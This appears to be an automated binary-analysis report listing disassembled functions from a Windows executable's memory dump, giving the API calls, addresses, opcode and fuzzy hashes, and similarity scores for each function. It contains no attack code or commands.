API String ID: 1303422935-0
Opcode ID: 3163681ad91e2cee2f9a6eaa66baaaf421e4da79f53822ff8cad87903d6e01b1
Instruction ID: 25490165fc6857c69720e5b45d4ed59ef477bd3d057dab6fdd1ea5666d3a0f43
Opcode Fuzzy Hash: 3163681ad91e2cee2f9a6eaa66baaaf421e4da79f53822ff8cad87903d6e01b1
Instruction Fuzzy Hash: 35210B728041087ACF24AB95CC45EDF3BB8DF46725F20422BFC25E1182EF74CA488669

Uniqueness

Uniqueness Score: -1.00%

Function 004349A2, Relevance: 4.6, APIs: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
Instruction ID: f49f4c1cb75c5fbd49bede2b2b2e0205ee8556af43aa466e30f1fd9c6e14c3ef
Opcode Fuzzy Hash: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
Instruction Fuzzy Hash: 38213874E04248DF9B05DFA898508FFFBB9EE9A304F0451AED841B3201EB749E05CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9DC, Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A9E1
___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040AA60

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID:
API String ID: 3696715561-0
Opcode ID: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
Instruction ID: 0113cde70424d24ccef5238eb5fdd89d76e8d8ac18f929500eaf95b908a89b9e
Opcode Fuzzy Hash: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
Instruction Fuzzy Hash: 0421D231710705EBCF20EAA5DA81BDE73A5AF08314F10442BF802A61D1D7789E51CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00460615, Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0046061E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0046068C

Part of subcall function 0045AB92: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045CBC8,?,00000000,00000000), ref: 0045AC34

Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

_free.LIBCMT ref: 0046067D

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 161d4ce99fb82861c98630982981d623808fe3b4cdcfb1378ac01625869f74ee
Instruction ID: 2d08a8e01bfa14f0e9bf738908fa259ffbb5ee05d2513bf0bc5b5480d6e09692
Opcode Fuzzy Hash: 161d4ce99fb82861c98630982981d623808fe3b4cdcfb1378ac01625869f74ee
Instruction Fuzzy Hash: 1001FCB2E012117B67315A775C88D7B585DCDC6B95315012FFD01D6202F9A8CD1181FF

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF49, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000244,?,?,0041FD07,00000140,?,?,00000000), ref: 0041EF66
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,0041FD07,00000140,?,?,00000000,?,004205B0), ref: 0041EF87
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,0041FD07,00000140,?,?,00000000,?,004205B0,?,?,00000244,00488780), ref: 0041EFC1

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
Instruction ID: 590f5f10effc152a812acbf342452f322146615697fe813b7eabbc86673be59a
Opcode Fuzzy Hash: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
Instruction Fuzzy Hash: 81118674A44305BEE7108F399C85F96BB98FB05320F104625F925D72C1D3B4A9408764

Uniqueness

Uniqueness Score: -1.00%

Function 0043DBE2, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 0043DC15
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,74E06490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC32
CloseHandle.KERNEL32(?,?,?,00004098,74E06490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC42

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleMappingView
String ID:
API String ID: 1187395538-0
Opcode ID: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
Instruction ID: 550ff010cc939da366848678e5ec9f0b7c02c89e159099b7b19e896844ef7b36
Opcode Fuzzy Hash: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
Instruction Fuzzy Hash: D7115670D10B009EDB328B17AC44B13BAE9EB9A761F10652FE59581640D6F49844DF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00459D09, Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00421A56,00000000,00000002,00421A56,00000000,?,?,?,00459DB6,00000000,00000000,00421A56,00000002), ref: 00459D42
GetLastError.KERNEL32(?,00459DB6,00000000,00000000,00421A56,00000002,?,004464A1,?,00000000,00000000,00000001,00421A56,?,?,00446557), ref: 00459D4C
__dosmaperr.LIBCMT ref: 00459D53

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
Instruction ID: a1e4ff7bec2cfff123a609e7ffbf930a0197e3222467c7c804d78764c443cfe2
Opcode Fuzzy Hash: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
Instruction Fuzzy Hash: 45014C33B00115EFCF159F59DC0586E3B39DF85321B24020AF8119B291FB75DD0587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042B31D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B322

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 0042BC7F: __EH_prolog.LIBCMT ref: 0042BC84

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

"\, xrefs: 0042B528

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: "\
API String ID: 2428181759-2226538752
Opcode ID: 1ea5da2f81d9de42064687d38ea717d16334ba31c7022bf82102b6f75f2cff79
Instruction ID: 74c8e02cedf363cec93cb5a21cd2564252097201552f7d0fce9620bf0d274a46
Opcode Fuzzy Hash: 1ea5da2f81d9de42064687d38ea717d16334ba31c7022bf82102b6f75f2cff79
Instruction Fuzzy Hash: 3FC1E130E04258CBDF15EFA5C9906EDBB71EF55308F5480AED0497B242DF381A89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042396F, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00423974

Part of subcall function 00423933: __EH_prolog.LIBCMT ref: 00423938

Part of subcall function 00423F4A: __EH_prolog.LIBCMT ref: 00423F4F

Part of subcall function 004254E9: __EH_prolog.LIBCMT ref: 004254EE

Part of subcall function 00424016: __EH_prolog.LIBCMT ref: 0042401B

Part of subcall function 0041CAD5: __EH_prolog.LIBCMT ref: 0041CADA

Part of subcall function 00424242: __EH_prolog.LIBCMT ref: 00424247

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 0041CAB0: ___std_exception_destroy.LIBVCRUNTIME ref: 0041CAC0
Part of subcall function 0041CAB0: ___std_exception_destroy.LIBVCRUNTIME ref: 0041CACB

Strings

value, xrefs: 004239EE, 00423B1A

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$___std_exception_destroy$Deallocate
String ID: value
API String ID: 2272592100-494360628
Opcode ID: 64825f0e8cebec80e4cc1e271598469194a22beeb35caa164c146c02015dfab1
Instruction ID: 66a2e6189b6b943d6559cdd19a0d777b97a615ec6dd76825e7901d2b3a8c13ca
Opcode Fuzzy Hash: 64825f0e8cebec80e4cc1e271598469194a22beeb35caa164c146c02015dfab1
Instruction Fuzzy Hash: CB712671E00258AACB15EFB5D8417DEBBF4AF49304F40449FE445A7282DB7C5B48CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A2D9

Part of subcall function 004091F2: __EH_prolog.LIBCMT ref: 004091F7
Part of subcall function 004091F2: std::exception::exception.LIBCONCRT ref: 00409298

Strings

Unknown exception, xrefs: 0040A348

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$std::exception::exception
String ID: Unknown exception
API String ID: 1037574509-410509341
Opcode ID: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
Instruction ID: d1b7aa20dfa380f05ae0c9d45f11c5fbc92261fe5dbcb6166fee3a439ce0bcbc
Opcode Fuzzy Hash: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
Instruction Fuzzy Hash: 1B21A972D00305AFCB159FA9D4405EAFBB1FF08308F10C56EE81AAB241D3759A01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004137E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004137E9

Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2

Strings

NA, xrefs: 0041383D

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: NA
API String ID: 3519838083-2562218444
Opcode ID: 0b9fead643c8d87b1b7af29e0f99aa140132e5f4ebffb137673190921e10b8aa
Instruction ID: da25af750edcbdee1afc70327f05f7be60494842f1cb4fd143c88d520103cf3c
Opcode Fuzzy Hash: 0b9fead643c8d87b1b7af29e0f99aa140132e5f4ebffb137673190921e10b8aa
Instruction Fuzzy Hash: D1119171A05215AFDF15EFA9C8857DEBBB0AF08304F0080AFE509A7391C7749E04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00412B79, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412B7E

Part of subcall function 00413383: __EH_prolog.LIBCMT ref: 00413388

Strings

pOA, xrefs: 00412B9B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: pOA
API String ID: 3519838083-3716846478
Opcode ID: dc5d0c48c73b47206b199b72f269ad7969b1bdc6c4a85331370fab92cf4e90e7
Instruction ID: 5e5ced76d1c4fd54a0b734acc99afaa11967ed71290437ac02fced9b03c88cc4
Opcode Fuzzy Hash: dc5d0c48c73b47206b199b72f269ad7969b1bdc6c4a85331370fab92cf4e90e7
Instruction Fuzzy Hash: 2BF0C9B86106559FC725CF18C449D5ABBF4FB08318700865EE49A87711D7B5ED05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00428967, Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042896C
_Deallocate.LIBCONCRT ref: 00428A50

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID:
API String ID: 3708980276-0
Opcode ID: da70b49f19cd11fc8ae126e23475479c419105f9ee95ce29b8ce58685c0aff7c
Instruction ID: a05692a87fbd5d51c0df5699b7bb909610a5f18793d2a9e166832a209d6f4d31
Opcode Fuzzy Hash: da70b49f19cd11fc8ae126e23475479c419105f9ee95ce29b8ce58685c0aff7c
Instruction Fuzzy Hash: F231C0B1A01205EFCB14EF65D441BAEBBF0FF48318F10841FE008A7641DB79AA54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004091F2, Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004091F7
std::exception::exception.LIBCONCRT ref: 00409298

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologstd::exception::exception
String ID:
API String ID: 2619619420-0
Opcode ID: f609cfb5bc4f61f6821307a2f6bf41c080323cdc5d5257e562f737a67b82de2d
Instruction ID: 4ca3936c078d54e57671f6f98a26ddc2dbffc98c2064a6f7f6a0a40424ae653c
Opcode Fuzzy Hash: f609cfb5bc4f61f6821307a2f6bf41c080323cdc5d5257e562f737a67b82de2d
Instruction Fuzzy Hash: 9E31F571D00208DFCB15EFA9C885ADEBBF4FF18314F14842EE415A7281E7789A85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004133DB, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004133E0
std::locale::_Init.LIBCPMT ref: 00413428

Part of subcall function 0043F7E5: std::_Lockit::_Lockit.LIBCPMT ref: 0043F7F7
Part of subcall function 0043F7E5: std::locale::_Setgloballocale.LIBCPMT ref: 0043F812
Part of subcall function 0043F7E5: _Yarn.LIBCPMT ref: 0043F828
Part of subcall function 0043F7E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0043F868

Part of subcall function 00413514: __EH_prolog.LIBCMT ref: 00413519

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 2277578679-0
Opcode ID: 2aee651974f205d737d6ac32d54ef4e0e4ed2081dbd54015839d45e7ad123df5
Instruction ID: 2797602d6ede606213e337ce2324edd57e786c084a3637d07d4407523244eb77
Opcode Fuzzy Hash: 2aee651974f205d737d6ac32d54ef4e0e4ed2081dbd54015839d45e7ad123df5
Instruction Fuzzy Hash: 78113AB1A00B06BBD344DF2AC5C1655FBB4FF48328B50862FE40997A81D774A960CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCB2, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
_strlen.LIBCMT ref: 0041FCD8

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory_strlen
String ID:
API String ID: 942933051-0
Opcode ID: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
Instruction ID: 4c7206307d1035eeeff1e9c0a0999dde91d7a809fbe3ac133bfd090c61ce09d6
Opcode Fuzzy Hash: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
Instruction Fuzzy Hash: 77014C726082055AE728977DB805BFB73E99B45724F20003FF857C7180EA68DCC7825C

Uniqueness

Uniqueness Score: -1.00%

Function 00435484, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00435489

Part of subcall function 00435346: lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353C0
Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353CC

_strlen.LIBCMT ref: 0043549D

Part of subcall function 004116B4: __EH_prolog.LIBCMT ref: 004116B9

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologlstrcpy$_strlenlstrlen
String ID:
API String ID: 27009005-0
Opcode ID: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
Instruction ID: 967c59de1264e5437e808e2dc9646ed90955aae641b5eab628f7aa89402fc85e
Opcode Fuzzy Hash: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
Instruction Fuzzy Hash: AC112570D00556EAEB19FB75DC52EEEBB359F50308F1081AEE00663243EB384B45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0043DDD0, Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000001,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,0043E3C4,?), ref: 0043DE13

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
Instruction ID: 7b0ff4dd052904a3b23983b3bd9cd87b3b88dbabaee70fd5e41bad5e6d0b566c
Opcode Fuzzy Hash: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
Instruction Fuzzy Hash: B401B171A00B00AFE7214E3AACC6BA7FEE8FB69758F10413FF65686250C7B49C009625

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADBE, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADCA

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADDC

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
String ID:
API String ID: 478157137-0
Opcode ID: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction ID: a824447d2fdea08db754f01d1575c5cda49c6909b15693c7d8439b486d980dbb
Opcode Fuzzy Hash: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction Fuzzy Hash: DBE0803110424577DF015A13DD0196B7717FF91355B10103BFD0456991D775DC7165D9

Uniqueness

Uniqueness Score: -1.00%

Function 0043EC21, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043EF0B,?,0040B6A1,00000000,?,?,?,?,0040B6A1,?), ref: 0043EC31
GetLastError.KERNEL32(?,0043EF0B,?,0040B6A1,00000000,?), ref: 0043EC47

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 58b0a90eb6ed054f5c13d71288aa4f4864bf2095164f77525f082a59b8b3d4fb
Instruction ID: c3eae09050113aaa56b93bb7bcaafac247cb116d4b7d05269366418418acabbb
Opcode Fuzzy Hash: 58b0a90eb6ed054f5c13d71288aa4f4864bf2095164f77525f082a59b8b3d4fb
Instruction Fuzzy Hash: 7DE02630A08188BFDB018B66DC08F6E3FE9AF18304F18C054F40485251DAB4D501DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0042B76D, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B772

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID:
API String ID: 3708980276-0
Opcode ID: 452b543969d657009498ee8d79f29310a02faa17d57340543940866113d00b44
Instruction ID: 961e30c5faa2a638eb1dabf367997125721a18bc80a6a3d51cdc21dae2d9d728
Opcode Fuzzy Hash: 452b543969d657009498ee8d79f29310a02faa17d57340543940866113d00b44
Instruction Fuzzy Hash: BA819C70D012AC9ADB01DFE9DA811ECFBB0FF6A308F50925EE84477252DB740A89CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00411230, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00411235

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a5b944ba661520ff1384948320fddcd62c7b4f0f6bcb1ee2f4d6b7b57e768216
Instruction ID: dc4a73e1b3eed8f5466efea9ab6fbc2949c634d1f19277dd442a4c8a1a499091
Opcode Fuzzy Hash: a5b944ba661520ff1384948320fddcd62c7b4f0f6bcb1ee2f4d6b7b57e768216
Instruction Fuzzy Hash: 6E515831D00219DFDF14DFA9D4908EEBBB5EF48320F60026FE522A3695D739A985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00413B98, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413B9D

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d969057b2c9edf4b20e3a5efd7ebe5ea69cb5f15263f61e9dfcb87d24167adf6
Instruction ID: 1590526c6e7a1ea769188aa884af5b1b43062d79938ce3292021d864919962f1
Opcode Fuzzy Hash: d969057b2c9edf4b20e3a5efd7ebe5ea69cb5f15263f61e9dfcb87d24167adf6
Instruction Fuzzy Hash: A851B135A045059FCB24CFACC5C08EDBBB1BF48715B24425AE525AB392E734EE81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00411A2D, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136e2d5060c300c8850c97b609d552001e63cfd608da55fb154b8d73bc9760d9
Instruction ID: 9296e774f7676c17423c1ca821238ec4e049e1c4d15cb0688202de38e1809e13
Opcode Fuzzy Hash: 136e2d5060c300c8850c97b609d552001e63cfd608da55fb154b8d73bc9760d9
Instruction Fuzzy Hash: 5A410774A04705DFC715CF68C18099ABBF1FF4A314B108AAAD95A8B7A0E734F980CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1D7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F207

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
Instruction ID: 7a39a49cf585f4d0e46ac43e0a9d888c8851a94b0eff99b2d07aad98a01891d0
Opcode Fuzzy Hash: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
Instruction Fuzzy Hash: 0B310679F04205ABDF14CAA5C8406EEBBA5AB41320F2441BFE501E73C1DA799DCA8748

Uniqueness

Uniqueness Score: -1.00%

Function 0043614D, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00436152

Part of subcall function 00413383: __EH_prolog.LIBCMT ref: 00413388

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 059ca1873fcc2719343bcb834764f13c4c9169dddaad165c4e9b81eb8f9653c6
Instruction ID: fe10076f0eb781e04d3e5f2d024a678e22d48b2bbc721e39841d5c83f663e4db
Opcode Fuzzy Hash: 059ca1873fcc2719343bcb834764f13c4c9169dddaad165c4e9b81eb8f9653c6
Instruction Fuzzy Hash: 6D3138B1901218DFEB14DF65DC95FEDB3B4AB44304F1081AFE809A7281D7745E44CE64

Uniqueness

Uniqueness Score: -1.00%

Function 00423759, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042375E

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f197d4875804d709254ad214c8d602c96c53891e32234fe1edb807fa65311c91
Instruction ID: 137a404eb818c1bae8e9071f7225fb2e884e1bd3418b789533b972b60974548f
Opcode Fuzzy Hash: f197d4875804d709254ad214c8d602c96c53891e32234fe1edb807fa65311c91
Instruction Fuzzy Hash: 83316BB4A01259DFDF14DFA9D850BEDBBB4BF48309F0481AEE00AA3241DB785B49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004392B7, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004392BC

Part of subcall function 004147AA: __EH_prolog.LIBCMT ref: 004147AF

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ea0b6e27bd021820b62f47da8042964ebdbd49466a4f660c9dccf5ea70a4d932
Instruction ID: 6be09e817262d6fd016b7c756547bfcd74f1d2dd2460e91cb2eed3baf958d87c
Opcode Fuzzy Hash: ea0b6e27bd021820b62f47da8042964ebdbd49466a4f660c9dccf5ea70a4d932
Instruction Fuzzy Hash: 78317EB1E082449FCB14DFA9C490AADBBB0AF4C324F24515FE416973C1DBB88E45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004235F2, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004235F7

Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
